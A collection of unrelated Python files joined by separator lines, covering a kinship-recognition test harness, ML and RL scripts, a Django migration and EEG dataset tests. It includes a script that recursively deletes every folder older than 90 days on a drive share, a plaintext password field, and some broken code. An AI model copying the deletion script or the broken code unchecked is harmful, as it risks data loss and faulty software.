def __init__(self, modNet, dloader):
self.device = torch.device("cuda:0" if torch.cuda.is_available() else "cpu")
self.dloader = dloader
self.Net = modNet()
def ki_test(self, ckpth, list_path, img_root, test_id, test_batch, ntype='', real_sn=False,test_each=False):
"""
kinship identification test
:return:
"""
self.Net.load(ckpth)
self.infer = partial(self.Net.inference,net_type=ntype)
test_set = self.dloader(list_path, img_root, test_id, transform=test_transform, test=True, test_each=test_each,real_sn = real_sn)
test_loader = DataLoader(test_set, batch_size=test_batch)
total_pred = []
total_label=[]
self.Net.net.eval()
with torch.no_grad():
for data in test_loader:
images, labels, _, _ = data
images, labels = images.to(self.device), labels.to(self.device)
if ntype =='cascade':
predicted = self.infer(images)
else:
outputs = self.infer(images)
_, predicted = torch.max(outputs.data, 1)
predicted = predicted.cpu().data.numpy()
labels = labels.cpu().data.numpy()
total_pred = np.concatenate((total_pred, predicted), axis=0)
total_label = np.concatenate((total_label, labels), axis=0)
if real_sn:
confu_m = confusion_matrix(total_label, total_pred, labels=[1, 2, 3, 4], normalize='true')
f10_fd = fbeta_score(total_label, total_pred, labels=[1], beta=10, average='macro')
f10_fs = fbeta_score(total_label, total_pred, labels=[2], beta=10, average='macro')
f10_md = fbeta_score(total_label, total_pred, labels=[3], beta=10, average='macro')
f10_ms = fbeta_score(total_label, total_pred, labels=[4], beta=10, average='macro')
micro_f1 = fbeta_score(total_label, total_pred, beta=10, average='macro')
acc = sum(total_label == total_pred) / len(total_label)
return confu_m, f10_fd, f10_fs, f10_md, f10_ms, micro_f1, acc
else:
if test_each:
confu_m = confusion_matrix(total_label, total_pred, labels=[1, 2, 3, 4], normalize='true')
micro_f1 = f1_score(total_label, total_pred)
acc = sum(total_label == total_pred) / len(total_label)
return confu_m, micro_f1, acc
else:
confu_m = confusion_matrix(total_label, total_pred, labels=[1, 2, 3, 4], normalize='true')
micro_f1 = f1_score(total_label, total_pred, average='macro')
acc = sum(total_label == total_pred) / len(total_label)
return confu_m, micro_f1, acc
def cv_ki(self,ckp_pth,train_ls,data_pth,savename,test_batch,n_type='',real_sn = False,test_each=False):
"""
cross validation kinship identification
:param ckp_pth:
:param train_ls:
:param data_pth:
:param savename:
:return:
"""
divnum = len(os.listdir(ckp_pth))
if real_sn:
con_avg = 0
f10 = 0
f10_fd_all = 0
f10_fs_all = 0
f10_md_all = 0
f10_ms_all = 0
avg_acc = 0
for i, ld in enumerate(sorted(os.listdir(ckp_pth))):
ld = os.path.join(ckp_pth, ld)
confu_norm, f10_fd, f10_fs, f10_md, f10_ms, micro_f1, acc =self.ki_test(ckpth=ld,list_path=train_ls,
img_root=data_pth,test_id=[5-i],
test_batch=test_batch, ntype=n_type,
real_sn= real_sn,test_each=test_each)
con_avg = confu_norm + con_avg
f10_fd_all += f10_fd
f10_fs_all += f10_fs
f10_md_all += f10_md
f10_ms_all += f10_ms
f10 += micro_f1
avg_acc += acc
con_avg = con_avg / 5
f10 = f10 / 5
f10_fd_all /= 5
f10_fs_all /= 5
f10_md_all /= 5
f10_ms_all /= 5
avg_acc = avg_acc / 5
f10_4avg = (f10_fd_all + f10_fs_all + f10_md_all + f10_ms_all) / 4
print(con_avg)
print('f10_fd:{}'.format(f10_fd_all))
print('f10_fs:{}'.format(f10_fs_all))
print('f10_md:{}'.format(f10_md_all))
print('f10_ms:{}'.format(f10_ms_all))
print('avg:{}'.format(f10_4avg))
print('average_macro_f1:{}'.format(f10))
print('avg acc:{:04}'.format(avg_acc))
plt.figure()
df_cm = pd.DataFrame(con_avg, ['F-D', 'F-S', 'M-D', 'M-S'], ['F-D', 'F-S', 'M-D', 'M-S'])
sn.set(font_scale=0.8) # for label size
sn.heatmap(df_cm, vmin=0, vmax=1, cmap='Blues', annot=True, annot_kws={"size": 16}) # font size
# plt.show()
plt.savefig('{}-kfw-{}-combine-hm.png'.format(savename, test_data))
else:
con_avg = 0
mf1 = 0
avg_acc = 0
for i, ld in enumerate(sorted(os.listdir(ckp_pth))):
ld = os.path.join(ckp_pth, ld)
confu_norm, micro_f1, acc = self.ki_test(ckpth=ld,list_path=train_ls,
img_root=data_pth,test_id=[5-i],
test_batch=test_batch, ntype=n_type,real_sn= real_sn,test_each=test_each)
con_avg = confu_norm + con_avg
mf1 += micro_f1
avg_acc += acc
con_avg = con_avg / divnum
mf1 = mf1 / divnum
avg_acc = avg_acc / divnum
print(con_avg)
print('average_macro_f1:{}'.format(mf1))
print('average multiclass acc:{:04}'.format(avg_acc))
plt.figure()
# df_cm = pd.DataFrame(con_avg, ['No-kin', 'F-D', 'F-S', 'M-D', 'M-S'], ['No-kin', 'F-D', 'F-S', 'M-D', 'M-S'])
df_cm = pd.DataFrame(con_avg, ['F-D', 'F-S', 'M-D', 'M-S'], ['F-D', 'F-S', 'M-D', 'M-S'])
sn.set(font_scale=0.8) # for label size
sn.heatmap(df_cm, vmin=0, vmax=1, cmap='Blues', annot=True, annot_kws={"size": 16}) # font size
# plt.show()
# plt.savefig('stage3-{}_test1{}_hm{}.png'.format(number,stage3_joint_config.kin_config.model_name, '_avg'))
plt.savefig('{}-kfw-{}-hm.png'.format(savename,test_data))
if __name__ == '__main__':
test_data = 'I'
train_ls = ['/home/wei/Documents/DATA/kinship/KinFaceW-{}/meta_data/fd_pairs.mat'.format(test_data),
'/home/wei/Documents/DATA/kinship/KinFaceW-{}/meta_data/fs_pairs.mat'.format(test_data),
'/home/wei/Documents/DATA/kinship/KinFaceW-{}/meta_data/md_pairs.mat'.format(test_data),
'/home/wei/Documents/DATA/kinship/KinFaceW-{}/meta_data/ms_pairs.mat'.format(test_data)]
data_pth = ['/home/wei/Documents/DATA/kinship/KinFaceW-{}/images/father-dau'.format(test_data),
'/home/wei/Documents/DATA/kinship/KinFaceW-{}/images/father-son'.format(test_data),
'/home/wei/Documents/DATA/kinship/KinFaceW-{}/images/mother-dau'.format(test_data),
'/home/wei/Documents/DATA/kinship/KinFaceW-{}/images/mother-son'.format(test_data)]
# ckp_1 = '/home/wei/Documents/CODE/kinship/data/checkpoints/kfw1_stage3_13/stage3-join_atten7_fix'
# ckp_2 = '/home/wei/Documents/CODE/kinship/data/checkpoints-kfw2/kfw2_stage3_5/stage3-join_atten7_fix'
ckp_1 = '/home/wei/Documents/CODE/ECCV/eccv/data/checkpoints/final/pin1-join_atten7_fix'
ckp_2 = '/home/wei/Documents/CODE/ECCV/eccv/data/checkpoints/final/ww2-join_atten7_fix'
ckp_dict = {'I': ckp_1, 'II': ckp_2}
ckp_pth = ckp_dict[test_data]
# kinship verification
testmode = test(JLNet, KinDataset_condufusion2)
print('test fd')
testmode.cv_ki(ckp_pth, train_ls[0], data_pth[0], 'fd', test_batch=100, n_type='fd', real_sn=False, test_each = True)
print('test fs')
testmode.cv_ki(ckp_pth, train_ls[1], data_pth[1], 'fs', test_batch=100, n_type='fs', real_sn=False, test_each=True)
print('test md')
testmode.cv_ki(ckp_pth, train_ls[2], data_pth[2], 'md', test_batch=100, n_type='md', real_sn=False, test_each=True)
print('test ms')
testmode.cv_ki(ckp_pth, train_ls[3], data_pth[3], 'ms', test_batch=100, n_type='ms', real_sn=False, test_each=True)
# kinship identification
testmode = test(JLNet,KinDataset_condufusion2)
testmode.cv_ki(ckp_pth,train_ls,data_pth,'try',test_batch=1000,n_type='cascade',real_sn=False)
|
# tuples are immutable lists
t = ("Hello", 4, 4.4)
print(t)
print(t[-1])
|
'''
Created on 8 de dez de 2016
@author: vagnerpraia
'''
from sklearn import metrics
from sklearn.model_selection import train_test_split
from sklearn.linear_model import LogisticRegression
from sklearn.naive_bayes import GaussianNB
from sklearn.neighbors import KNeighborsClassifier
from sklearn.tree import DecisionTreeClassifier
from sklearn.svm import SVC
from sklearn.ensemble import RandomForestClassifier, AdaBoostClassifier
from sklearn.model_selection import cross_val_score
'''
classifiers = [
KNeighborsClassifier(3),
SVC(kernel="linear", C=0.025),
SVC(gamma=2, C=1),
GaussianProcessClassifier(1.0 * RBF(1.0), warm_start=True),
DecisionTreeClassifier(max_depth=5),
RandomForestClassifier(max_depth=5, n_estimators=10, max_features=1),
MLPClassifier(alpha=1),
AdaBoostClassifier(),
GaussianNB(),
QuadraticDiscriminantAnalysis()]
'''
def prepare_data(data, target):
return train_test_split(data, target, test_size=0.3, random_state=0)
def execute(model, data, target):
data_train, data_test, target_train, target_test = prepare_data(data, target)
model.fit(data_train, target_train.values.ravel())
predicted = model.predict(data_test)
print predicted[0:5]
expected = target_test
print(model)
print('')
scores = model.score(data_test, target_test)
print(scores)
print('')
print(metrics.classification_report(expected, predicted))
print('')
scores = cross_val_score(model, data, target.values.ravel(), cv=10)
print(scores)
print('')
def execute_logistic_regression(data, target):
model = LogisticRegression()
execute(model, data, target)
def execute_gaussian_nb(data, target):
model = GaussianNB()
execute(model, data, target)
def execute_k_neighbors_classifier(data, target):
model = KNeighborsClassifier()
execute(model, data, target)
def execute_decision_tree_classifier(data, target):
model = DecisionTreeClassifier()
execute(model, data, target)
def execute_svc(data, target):
model = SVC()
execute(model, data, target)
def execute_ada_boost_classifier(data, target):
model = AdaBoostClassifier()
execute(model, data, target)
def execute_random_forest_classifier(data, target):
model = RandomForestClassifier(max_depth=5, n_estimators=10, max_features=1)
execute(model, data, target) |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# time: 2020-8-9 23:11:00
# version: 1.0
# __author__: zhilong
from selenium import webdriver
from selenium.webdriver.common.keys import Keys
driver = webdriver.Firefox()
driver.get('http://www.python.org')
assert 'Python' in driver.title
elem = driver.find_element_by_name('q')
elem.clear()
elem.send_keys('pycon')
elem.send_keys(Keys.RETURN)
assert 'no results found.' not in driver.page_source
driver.close()
|
'''
https://en.wikipedia.org/wiki/Benford's_law
'''
import matplotlib.pyplot as plt
import numpy
def chart_data():
return [(x, numpy.log10((x+1)/x)) for x in range(1,10)]
def main():
for x,y in chart_data():
plt.plot([x,x], [0,y])
plt.ylabel('probability')
plt.xlabel('digit')
plt.show()
if __name__ == "__main__":
main() |
# !/usr/bin/env python
# -*-coding:utf-8 -*-
# Author: Renkai
import json
import requests
def readJson():
return json.load(open('one.json','r')) # 返回python字典
print(readJson()['item'][0]['request'])
def one_get():
r = requests.request(method='',url='')
return r.json()
|
import torch
import torch.nn as nn
import torch.optim as optim
import torch.utils.data as Data
from model_ssd300 import SSD300
from datasets import PascalVOCDataset
def create_label_map():
#lable map
voc_labels = ('aeroplane', 'bicycle', 'bird', 'boat', 'bottle', 'bus', 'car', 'cat', 'chair', 'cow', 'diningtable','dog', 'horse', 'motorbike', 'person', 'pottedplant', 'sheep', 'sofa', 'train', 'tvmonitor')
#将标签变成整数,值得注意的是label_map是字典的形式
label_map={k:v+1 for v,k in enumerate(voc_labels)}
label_map['background']=0
return voc_labels,label_map #返回原始标签和label字典
#数据参数
data_folder='./'
keep_difficult=True
##模型参数
#类别
_,label_map=create_label_map()
n_classes=len(label_map)
#设备
device=torch.device("cuda" if torch.cuda.is_available() else "cpu")
##学习参数
#模型结点的路径
checkpoint=None
#batch_size
batch_size=8
#迭代次数
iterations=120000
#加载数据的进程,好像Windows只能是0
#workers=4
workers=0
#每__batches打印训练的状态
print_freq=200
#学习率
lr=1e-3
#在一些迭代后衰减学习率
decay_lr_at=[80000,100000]
#衰减学习率为当前的多少被
decay_lr_to=0.1
#动量
momentum=0.9
#权重衰减
weight_decay=5e-4
#当梯度爆炸是进行一系列的操作,尤其是当在更大的batch_sizes
grad_clip=None
#...???...
# cudnn.benchmark=True
def main():
"""
训练
"""
global start_epoch,label_map,epoch,checkpoint,decay_lr_at
#初始化模型,或这是加载chekpoint(训练到一半的时候)
if checkpoint is None:
start_epoch=0
#(属于初始化的范畴)
model=SSD300(n_classes=n_classes)
#初始化优化器,后面怎么翻译...???...
biases=list()
not_biases=list()
for param_name,param in model.named_parameters(): #查看参数
if param.requires_grad:
#偏置和权重可学习参数分开
if param_name.endswith('.bias'):
biases.append(param)
else:
not_biases.append(param)
#为不同的可学习参数,设置不同的学习率
optimizer=torch.optim.SGD(params=[{'params':biases,'lr':2*lr},{'params':not_biases}],lr=lr,momentum=momentum,weight_decay=weight_decay)
else:
#如果要继续训练(属于初始化的范畴)
checkpoint=torch.load(checkpoint,map_location='cpu') #因为此时没有cuda,所以要这样写
start_epoch=checkpoint['epoch']+1
print('\nLoaded checkpoint from epoch %d.\n'%start_epoch)
model=checkpoint['model']
optimizer=checkpoint['optimizer']
#移动到默认的装置
model=model.to(device)
# criterion=MultiBosLoss()
#创建dataloaders
#data_folder='./'
# train_dataset=PascalVOCDataset(data_folder,split='train',keep_difficult=keep_difficult) #前面定义的是keep_difficult=True
#我不想保存难识别的样本
train_dataset=PascalVOCDataset(data_folder,split='train') #此时使用默认的False
train_loader=Data.DataLoader(train_dataset,batch_size=batch_size,shuffle=True,collate_fn=train_dataset.collate_fn,num_workers=workers,pin_memory=True)
if __name__=='__main__':
main()
|
# Generated by Django 2.0.7 on 2018-07-20 23:04
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('life', '0002_auto_20180718_1558'),
]
operations = [
migrations.CreateModel(
name='Home',
fields=[
('address', models.CharField(max_length=50, primary_key=True, serialize=False)),
('price', models.IntegerField(max_length=20)),
('landlord', models.CharField(max_length=30)),
],
),
migrations.CreateModel(
name='User',
fields=[
('username', models.CharField(max_length=30, primary_key=True, serialize=False)),
('password', models.CharField(max_length=50)),
('name', models.CharField(max_length=100)),
('photo', models.CharField(max_length=500)),
('hometown', models.CharField(max_length=30)),
],
),
]
|
"""
A script to download a cloud directory to a local directory.
"""
import argparse
import os
import logging
import sync_drives.sync as sync
import providers.provider_list as provider_list
from common.basic_utils import check_for_user_quit
def main(args):
logging.basicConfig(level=logging.INFO)
# Init provider metadata
provider_list.init_providers()
# Check that any initial authentication has been done:
if sync.required_config_is_present(args.provider, args.cpath, args.user) is False:
print('It doesn\'t appear you have completed the required authentication '
'step for {}'.format(args.provider))
return
print('==============================================================')
print("Preparing to download - press \'q\' then enter to stop the download.")
print('')
for res in sync.download_store(args.remote_store_path,
args.provider,
args.local_store_path,
args.user,
args.cpath,
''):
if check_for_user_quit() is True:
break
print('==============================================================')
print('')
if __name__ == '__main__':
parser = argparse.ArgumentParser(description=
'Dowloads the specified directory on the cloud server to a local location.')
parser.add_argument('provider', type=str, choices=provider_list.get_supported_provider_names(),
help='The name of the cloud drive provider.')
parser.add_argument('user', type=str,
help='The account name that identifies you to the drive provider.')
parser.add_argument('local_store_path', type=str,
help='The full path to the local store root directory.')
parser.add_argument('remote_store_path', type=str,
help='The full path to the remote store root directory (relative to the drive root).')
parser.add_argument('--cpath', type=str, default=os.getcwd(),
help='The full path to the directory that stores cloud-backup authentication'
'config files.')
main(parser.parse_args()) |
# Copyright (c) 2011, James Hanlon, All rights reserved
# This software is freely distributable under a derivative of the
# University of Illinois/NCSA Open Source License posted in
# LICENSE.txt and at <http://github.xcore.com/>
import sys
from util import debug
from ast import NodeVisitor
from builtin import builtins
class Children(NodeVisitor):
"""
An AST visitor to determine the children of each procedure.
"""
def __init__(self, sig, _debug=False):
self.debug = _debug
self.parent = None
self.children = {}
debug(self.debug, 'Initialising:')
for x in sig.mobile_proc_names:
debug(self.debug, ' '+x)
self.children[x] = []
def add_child(self, name):
"""
Add a child procedure call of the program:
- omit non-mobile builtins
- add only if it hasn't been already
- don't add if it is its parent (recursive)
"""
if ((not name in self.children[self.parent]) and name != self.parent
and not name in filter(lambda x: not builtins[x].mobile, builtins.keys())):
self.children[self.parent].append(name)
debug(self.debug, ' added child '+name+' to '+self.parent)
def build(self):
"""
Given immediate child relationships, calculate all nested relationships.
"""
change = True
# While there are still changes
while change:
change = False
# For each procedure x
for x in self.children.keys():
# For each child call y of x
for y in self.children[x]:
# for each child z of call y, or grandchild of x
for z in self.children[y]:
# Add it if it hasn't already been
if not z in self.children[x] and x != z:
self.children[x].append(z)
change = True
def display(self, buf=sys.stdout):
"""
Display children.
"""
for x in self.children.keys():
buf.write(x+':\n')
if x in self.children:
for y in self.children[x]:
buf.write('\t'+y+'\n')
buf.write('\n')
def visit_proc_def(self, node):
debug(self.debug, 'Definition: '+node.name)
self.parent = node.name
return 'proc'
def visit_stmt_pcall(self, node):
debug(self.debug, ' visiting pcall '+node.name)
self.add_child(node.name)
def visit_elem_fcall(self, node):
debug(self.debug, ' visiting fcall '+node.name)
self.add_child(node.name)
|
# -*- coding:utf-8 -*-
import os
import sys
import numpy as np
from simulater import Simulater
from play_back import PlayBack, PlayBacks
COMMAND = ['UP', 'DOWN', 'LEFT', 'RIGHT']
def get_max_command(target_dict):
return max([(v,k) for k,v in target_dict.items()])[1]
def simplify(command):
return command[0]
def print_Q(Q, x, y):
ret = []
for i in range(y):
ret.append(['0' for _ in range(x)])
for k in Q:
ret[k[1]][k[0]] = simplify(get_max_command(Q[k]))
for this_line in ret:
print(''.join(this_line))
if __name__ == '__main__':
# parameters
file_name = 'default.txt'
epoch_num = 1000
max_trial = 5000
gamma = 0.1
alpha = 0.1
epsilon = 0.5
# make simulater
sim = Simulater(file_name)
# initialize Q value
x, y = sim.map_size()
Q = {}
for i in range(x):
for j in range(y):
Q[(i, j)] = {_:np.random.normal() for _ in COMMAND}
#Q[(i, j)] = {_:0.0 for _ in COMMAND}
# main
minimum_pbs = None
for epoch in range(epoch_num):
sim.reset()
this_pbs = PlayBacks()
for i in range(max_trial):
# get current
current_x, current_y = sim.get_current()
# select_command
tmp_Q = Q[(current_x, current_y)]
command = get_max_command(tmp_Q) if np.random.uniform() > epsilon else np.random.choice(COMMAND)
current_value = tmp_Q[command]
# reward
reward = sim(command)
# update
next_x, next_y = sim.get_current()
next_max_command = get_max_command(Q[(next_x, next_y)])
next_value = Q[(next_x, next_y)][next_max_command]
tmp_Q[command] += alpha * (reward + gamma * next_value - current_value)
# play back
this_pbs.append(PlayBack((current_x, current_y),
command,
(next_x, next_y),
reward))
# end check
if sim.end_episode():
print('find goal')
epsilon *= 0.95
if epsilon < 0.05:
epsilon = 0.05
if minimum_pbs is None:
minimum_pbs = this_pbs
elif len(minimum_pbs) > len(this_pbs):
minimum_pbs = this_pbs
print(epsilon)
break
# update with minimum_pbs
if minimum_pbs is not None:
for pb in minimum_pbs:
tmp_Q = Q[pb.state]
current_value = tmp_Q[pb.action]
next_Q = Q[pb.next_state]
next_max_command = get_max_command(next_Q)
next_value = next_Q[next_max_command]
tmp_Q[pb.action] += alpha * (pb.reward + gamma * next_value - current_value)
sim.printing()
print('---')
print_Q(Q, x, y)
print('---')
|
import itertools
import matplotlib.pyplot as plt
from util import City, read_cities, write_cities_and_return_them, generate_cities, path_cost
def solve_tsp_dynamic(cities):
distance_matrix = [[x.distance(y) for y in cities] for x in cities]
cities_a = {(frozenset([0, idx + 1]), idx + 1): (dist, [0, idx + 1]) for idx, dist in
enumerate(distance_matrix[0][1:])}
for m in range(2, len(cities)):
cities_b = {}
for cities_set in [frozenset(C) | {0} for C in itertools.combinations(range(1, len(cities)), m)]:
for j in cities_set - {0}:
cities_b[(cities_set, j)] = min([(cities_a[(cities_set - {j}, k)][0] + distance_matrix[k][j],
cities_a[(cities_set - {j}, k)][1] + [j])
for k in cities_set if k != 0 and k != j])
cities_a = cities_b
res = min([(cities_a[d][0] + distance_matrix[0][d[1]], cities_a[d][1]) for d in iter(cities_a)])
return res[1]
if __name__ == "__main__":
cities = read_cities(16)
g = solve_tsp_dynamic(cities)
sol = [cities[gi] for gi in g]
print(path_cost(sol))
plt.show(block=True)
|
import datetime
import os
import shutil
import re
#Set a base Dir
basedir = r"\\localhost\d$"
for dirpath, dirnames, filenames in os.walk(basedir):
for d in dirnames:
curpath = os.path.join(dirpath, d)
dir_modified = datetime.datetime.fromtimestamp(os.path.getmtime(curpath))
# Conditional set to remove folders recursively older than 90 days.
if datetime.datetime.now() - dir_modified > datetime.timedelta(days=90):
shutil.rmtree(curpath)
|
# Function to find the minimum number of coins required
# to get total of N from set S
def findMinCoins(S, N):
# T[i] stores minimum number of coins needed to get total of i
T = [0] * (N + 1)
for i in range(1, N + 1):
# initialize minimum number of coins needed to infinity
T[i] = float('inf')
# do for each coin
for c in range(len(S)):
# check if index doesn't become negative by including
# current coin c
if i - S[c] >= 0:
res = T[i - S[c]]
# if total can be reached by including current coin c,
# update minimum number of coins needed T[i]
if res != float('inf'):
T[i] = min(T[i], res + 1)
# T[N] stores the minimum number of coins needed to get total of N
return T[N]
# if __name__ == '__main__':
# # n coins of given denominations
# S = [1, 2, 3, 4]
# # Total Change required
# N = 15
# coins = findMinCoins(S, N)
# if coins != float('inf'):
# print("Minimum number of coins required to get desired change is", coins) |
import skimage
import numpy as np
from PIL import Image
from albumentations import Resize
from data.transform import simple_transform
def get_iou(x1, x2):
intersection = np.clip((x1 * x2), 0, 1).sum()
union = np.clip((x1 + x2), 0, 1).sum()
if intersection == 0 and union == 0:
iou = 1.
elif union == 0:
iou = 0.
else:
iou = intersection / union
return iou
def precision_at(threshold, iou):
matches = iou > threshold
true_positives = np.sum(matches, axis=1) == 1 # Correct objects
false_positives = np.sum(matches, axis=0) == 0 # Missed objects
false_negatives = np.sum(matches, axis=1) == 0 # Extra objects
tp, fp, fn = np.sum(true_positives), np.sum(false_positives), np.sum(false_negatives)
return tp, fp, fn
def get_instance_iou(gt, pr, thresholds, beta=1, verbose=1):
"""
Calculate instance-wise F-score in range(0.5, 1, 0.05)
Source:
https://github.com/selimsef/dsb2018_topcoders/blob/master/selim/metric.py
Args:
gt: ground truth instances mask (each instance has its own unique value)
pr: predicted instances mask (each instance has its own unique value)
beta: F-score beta coeffitient
verbose: verbosity level
Returns:
score: float
"""
# separate instances
gt = skimage.measure.label(gt)
pr = skimage.measure.label(pr)
print_fn = lambda x: print(x) if verbose else None
true_objects = len(np.unique(gt))
pred_objects = len(np.unique(pr))
# Compute intersection between all objects
intersection = np.histogram2d(gt.flatten(), pr.flatten(), bins=(true_objects, pred_objects))[0]
# Compute areas (needed for finding the union between all objects)
area_true = np.histogram(gt, bins=true_objects)[0]
area_pred = np.histogram(pr, bins=pred_objects)[0]
area_true = np.expand_dims(area_true, -1)
area_pred = np.expand_dims(area_pred, 0)
# Compute union
union = area_true + area_pred - intersection
# Exclude background from the analysis
intersection = intersection[1:, 1:]
union = union[1:, 1:]
union[union == 0] = 1e-9
# Compute the intersection over union
iou = intersection / union
# Loop over IoU thresholds
prec = []
print_fn("Thresh\tTP\tFP\tFN\tPrec.")
for t in thresholds:
tp, fp, fn = precision_at(t, iou)
if tp + fp + fn == 0:
p = 1.
else:
p = (1 + beta ** 2) * tp / ((1 + beta ** 2) * tp + fp + beta ** 2 * fn + 1e-10)
print_fn("{:1.3f}\t{}\t{}\t{}\t{:1.3f}".format(t, tp, fp, fn, p))
prec.append(p)
print_fn("AP\t-\t-\t-\t{:1.3f}".format(np.mean(prec)))
return prec
def split_mask_to_zones(mask, lungs_labeled_mask, intersection_threshold=0.3):
# split lungs mask to separate masks, one area for each mask
lung_labels = [0, 1, 2]
assert np.unique(lungs_labeled_mask).tolist() == lung_labels
lung_areas = [lungs_labeled_mask == label for label in lung_labels]
# placeholder for result
background_mask = np.zeros_like(mask)
left_lung_mask = np.zeros_like(mask)
right_lung_mask = np.zeros_like(mask)
mask_areas = [background_mask, left_lung_mask, right_lung_mask]
# extract instances from mask
labeled_mask = skimage.measure.label(mask)
mask_labels = np.unique(labeled_mask)[1:] # to remove background
for label in mask_labels:
one_instance_mask = (labeled_mask == label)
one_instance_sum = one_instance_mask.sum()
for area_label in [0, 1, 2]: # 0 - backgound, 1 - left lung, 2 - right
intersection = one_instance_mask * lung_areas[area_label]
if intersection.sum() / one_instance_sum > intersection_threshold:
mask_areas[area_label] += intersection
return mask_areas
class LungRegionFeaturesExtractor:
def __init__(self, resize = 256):
self.lungs_labeled_mask = Resize(resize, resize).apply_to_mask(
np.array(Image.open("../../data/masks012/average_mask.png"))
)
self.thresholds = np.arange(0, 1, 0.1)
def extract(self, sample_mask, expert_mask):
expert_masks = split_mask_to_zones(expert_mask, self.lungs_labeled_mask, intersection_threshold=0.3)
sample_masks = split_mask_to_zones(sample_mask, self.lungs_labeled_mask, intersection_threshold=0.3)
ious_1 = [get_iou(em, sm) for em, sm in zip(expert_masks, sample_masks)]
ious_2 = [np.mean(get_instance_iou(em, sm, thresholds=self.thresholds, verbose=False)) for em, sm in
zip(expert_masks, sample_masks)]
return np.array([
get_iou(expert_mask, sample_mask),
np.mean(get_instance_iou(expert_mask, sample_mask, thresholds=self.thresholds, verbose=0)),
ious_1[0],
ious_1[1],
ious_1[2],
ious_2[0],
ious_2[1],
ious_2[2],
])
|
import inspect
import logging
import shutil
import tempfile
import unittest
import mne
import numpy as np
import moabb.datasets as db
import moabb.datasets.compound_dataset as db_compound
from moabb.datasets import Cattan2019_VR, Shin2017A, Shin2017B
from moabb.datasets.base import BaseDataset, is_abbrev, is_camel_kebab_case
from moabb.datasets.compound_dataset import CompoundDataset
from moabb.datasets.compound_dataset.utils import compound_dataset_list
from moabb.datasets.fake import FakeDataset, FakeVirtualRealityDataset
from moabb.datasets.utils import block_rep, dataset_list
from moabb.paradigms import P300
from moabb.utils import aliases_list
_ = mne.set_log_level("CRITICAL")
def _run_tests_on_dataset(d):
for s in d.subject_list:
data = d.get_data(subjects=[s])
# we should get a dict
assert isinstance(data, dict)
# We should get a raw array at the end
rawdata = data[s]["session_0"]["run_0"]
assert issubclass(type(rawdata), mne.io.BaseRaw), type(rawdata)
# print events
print(mne.find_events(rawdata))
print(d.event_id)
class TestRegex(unittest.TestCase):
def test_is_abbrev(self):
assert is_abbrev("a", "a-")
assert is_abbrev("a", "a0")
assert is_abbrev("a", "ab")
assert not is_abbrev("a", "aA")
assert not is_abbrev("a", "Aa")
assert not is_abbrev("a", "-a")
assert not is_abbrev("a", "0a")
assert not is_abbrev("a", "ba")
assert not is_abbrev("a", "a ")
def test_is_camell_kebab_case(self):
assert is_camel_kebab_case("Aa")
assert is_camel_kebab_case("aAa")
assert is_camel_kebab_case("Aa-a")
assert is_camel_kebab_case("1Aa-1a1")
assert is_camel_kebab_case("AB")
assert not is_camel_kebab_case("A ")
assert not is_camel_kebab_case(" A")
assert not is_camel_kebab_case("A A")
assert not is_camel_kebab_case("A_")
assert not is_camel_kebab_case("_A")
assert not is_camel_kebab_case("A_A")
class Test_Datasets(unittest.TestCase):
def test_fake_dataset(self):
"""This test will insure the basedataset works."""
n_subjects = 3
n_sessions = 2
n_runs = 2
for paradigm in ["imagery", "p300", "ssvep", "cvep"]:
ds = FakeDataset(
n_sessions=n_sessions,
n_runs=n_runs,
n_subjects=n_subjects,
paradigm=paradigm,
)
data = ds.get_data()
# we should get a dict
self.assertTrue(isinstance(data, dict))
# we get the right number of subject
self.assertEqual(len(data), n_subjects)
# right number of session
self.assertEqual(len(data[1]), n_sessions)
# right number of run
self.assertEqual(len(data[1]["session_0"]), n_runs)
# We should get a raw array at the end
self.assertIsInstance(data[1]["session_0"]["run_0"], mne.io.BaseRaw)
# bad subject id must raise error
self.assertRaises(ValueError, ds.get_data, [1000])
def test_fake_dataset_seed(self):
"""this test will insure the fake dataset's random seed works"""
n_subjects = 3
n_sessions = 2
n_runs = 2
seed = 12
for paradigm in ["imagery", "p300", "ssvep"]:
ds1 = FakeDataset(
n_sessions=n_sessions,
n_runs=n_runs,
n_subjects=n_subjects,
paradigm=paradigm,
seed=seed,
)
ds2 = FakeDataset(
n_sessions=n_sessions,
n_runs=n_runs,
n_subjects=n_subjects,
paradigm=paradigm,
seed=seed,
)
X1, _, _ = ds1.get_data()
X2, _, _ = ds2.get_data()
X3, _, _ = ds2.get_data()
# All the arrays should be equal:
self.assertIsNone(np.testing.assert_array_equal(X1, X2))
self.assertIsNone(np.testing.assert_array_equal(X3, X3))
def test_cache_dataset(self):
tempdir = tempfile.mkdtemp()
for paradigm in ["imagery", "p300", "ssvep"]:
dataset = FakeDataset(paradigm=paradigm)
# Save cache:
with self.assertLogs(
logger="moabb.datasets.bids_interface", level="INFO"
) as cm:
_ = dataset.get_data(
subjects=[1],
cache_config=dict(
save_raw=True,
use=True,
overwrite_raw=False,
path=tempdir,
),
)
print("\n".join(cm.output))
expected = [
"Attempting to retrieve cache .* datatype-eeg", # empty pipeline
"No cache found at",
"Starting caching .* datatype-eeg",
"Finished caching .* datatype-eeg",
]
self.assertEqual(len(expected), len(cm.output))
for i, regex in enumerate(expected):
self.assertRegex(cm.output[i], regex)
# Load cache:
with self.assertLogs(
logger="moabb.datasets.bids_interface", level="INFO"
) as cm:
_ = dataset.get_data(
subjects=[1],
cache_config=dict(
save_raw=True,
use=True,
overwrite_raw=False,
path=tempdir,
),
)
print("\n".join(cm.output))
expected = [
"Attempting to retrieve cache .* datatype-eeg",
"Finished reading cache .* datatype-eeg",
]
self.assertEqual(len(expected), len(cm.output))
for i, regex in enumerate(expected):
self.assertRegex(cm.output[i], regex)
# Overwrite cache:
with self.assertLogs(
logger="moabb.datasets.bids_interface", level="INFO"
) as cm:
_ = dataset.get_data(
subjects=[1],
cache_config=dict(
save_raw=True,
use=True,
overwrite_raw=True,
path=tempdir,
),
)
print("\n".join(cm.output))
expected = [
"Starting erasing cache .* datatype-eeg",
"Finished erasing cache .* datatype-eeg",
"Starting caching .* datatype-eeg",
"Finished caching .* datatype-eeg",
]
self.assertEqual(len(expected), len(cm.output))
for i, regex in enumerate(expected):
self.assertRegex(cm.output[i], regex)
shutil.rmtree(tempdir)
def test_dataset_accept(self):
"""Verify that accept licence is working."""
# Only BaseShin2017 (bbci_eeg_fnirs) for now
for ds in [Shin2017A(), Shin2017B()]:
# if the data is already downloaded:
if mne.get_config("MNE_DATASETS_BBCIFNIRS_PATH") is None:
self.assertRaises(AttributeError, ds.get_data, [1])
